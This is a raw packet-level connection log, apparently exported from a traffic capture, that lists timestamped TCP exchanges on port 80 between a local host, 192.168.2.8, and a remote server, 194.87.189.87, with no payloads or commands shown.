                                                                                                                                    Oct 6, 2024 21:27:38.001224041 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.001252890 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.002898932 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.002922058 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.002932072 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.002974033 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.006447077 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.006457090 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.006468058 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.006500006 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.008091927 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.008910894 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.008934975 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.008944988 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.008980036 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.012320995 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.012356043 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.012366056 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.012403965 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.012681961 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.015005112 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.015047073 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.015057087 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.015109062 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.018306017 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.018331051 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.018340111 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.018383026 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.018405914 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.021030903 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.021066904 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.021075964 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.021110058 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.025645018 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.025657892 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.025669098 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.025703907 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.025716066 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.027187109 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.027232885 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.027241945 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.027292013 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.030251026 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.030261993 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.030272961 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.030302048 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.030314922 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.032723904 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.032742023 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.032753944 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.032825947 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.035516024 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.035559893 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.035569906 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.035619974 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.035641909 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.038259029 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.038276911 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.038324118 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.038367033 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.041690111 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.041757107 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.041830063 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.041840076 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.041877985 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.044018030 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.044049978 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.044060946 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.044116020 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.046679020 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.046693087 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.046700954 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.046755075 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.046766043 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.049007893 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.049029112 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.049037933 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.049088955 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.052498102 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.052515984 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.052526951 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.052556038 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.052588940 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.055586100 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.055609941 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.055619001 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.055665016 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.058947086 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.058981895 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.059014082 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.059017897 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.059058905 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.060625076 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.060684919 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.060714960 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.060734034 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.062609911 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.062644005 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.062658072 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.062679052 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.063215971 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.064704895 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.064764977 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.064794064 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.064832926 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.066530943 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.066587925 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.066592932 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.128257990 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.128267050 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.128293037 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.128328085 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.128361940 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.128372908 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.128422976 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.135669947 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.135731936 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.135765076 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.135818005 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.135824919 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.135879040 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.135915041 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.135926008 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.135948896 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.135982990 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.136065006 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.145792961 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.145824909 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.145878077 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.145895958 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.145915985 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.145950079 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.145984888 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.145998001 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.146019936 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.146034956 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.146055937 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.148111105 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.151320934 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.151355982 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.151410103 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.151412010 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.151469946 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.151516914 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.151524067 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.151560068 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.151596069 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.151628971 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.151640892 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.151673079 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.156702042 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.156764030 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.156797886 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.156837940 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.156850100 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.156883955 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.156932116 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.156935930 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.156970978 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.157006025 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.157020092 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.157087088 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.161863089 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.161936998 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.161989927 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.162025928 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.162055016 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.162060976 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.162067890 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.162096024 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.162132978 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.162174940 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.166856050 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.166887999 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.166961908 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.167041063 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.167095900 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.167129993 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.167145967 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.167165041 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.167171955 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.167221069 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.167254925 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.167265892 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.171749115 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.171808958 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.171840906 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.171875000 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.171897888 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.171920061 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.171955109 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.172003984 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.172080040 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.172080040 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.172092915 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.172281981 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.175913095 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.175951004 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.175987959 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.176009893 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.176034927 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.176042080 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.176078081 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.176114082 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.176136971 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.176150084 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.176182985 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.180162907 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.180198908 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.180258036 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.180264950 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.180310011 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.180346012 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.180357933 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.180381060 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.180416107 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.180428028 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.180452108 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.181077957 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.184422970 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.184458971 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.184495926 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.184524059 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.184525013 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.184582949 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:42.363854885 CEST4974780192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:42.368721008 CEST8049747194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:42.368872881 CEST4974780192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:42.369002104 CEST4974780192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:42.369024992 CEST4974780192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:42.373951912 CEST8049747194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:42.373975039 CEST8049747194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:42.373986006 CEST8049747194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:45.074835062 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:45.080348969 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:45.080674887 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.082334042 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.087366104 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.087433100 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.087595940 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.088781118 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.092780113 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.092832088 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.093636036 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.093647003 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.093662977 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.093672037 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545018911 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545021057 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545036077 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545048952 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545070887 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545074940 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545092106 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545101881 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545114040 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545147896 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545150042 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545176983 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545197010 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545202971 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545227051 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545231104 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545243979 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545258045 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545274973 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545284986 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545300961 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545311928 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545325994 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545337915 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545361996 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545365095 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545380116 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545392990 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545412064 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545435905 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.548059940 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.548120022 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.548135996 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.548137903 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.548145056 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.548166037 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.548211098 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.548317909 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.548361063 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.548614025 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.548623085 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.548661947 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.548683882 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.549014091 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.549022913 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.549032927 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.549063921 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.549078941 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.549091101 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.549099922 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.549124002 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.549133062 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.549159050 CEST4974880192.168.2.8194.87.189.87
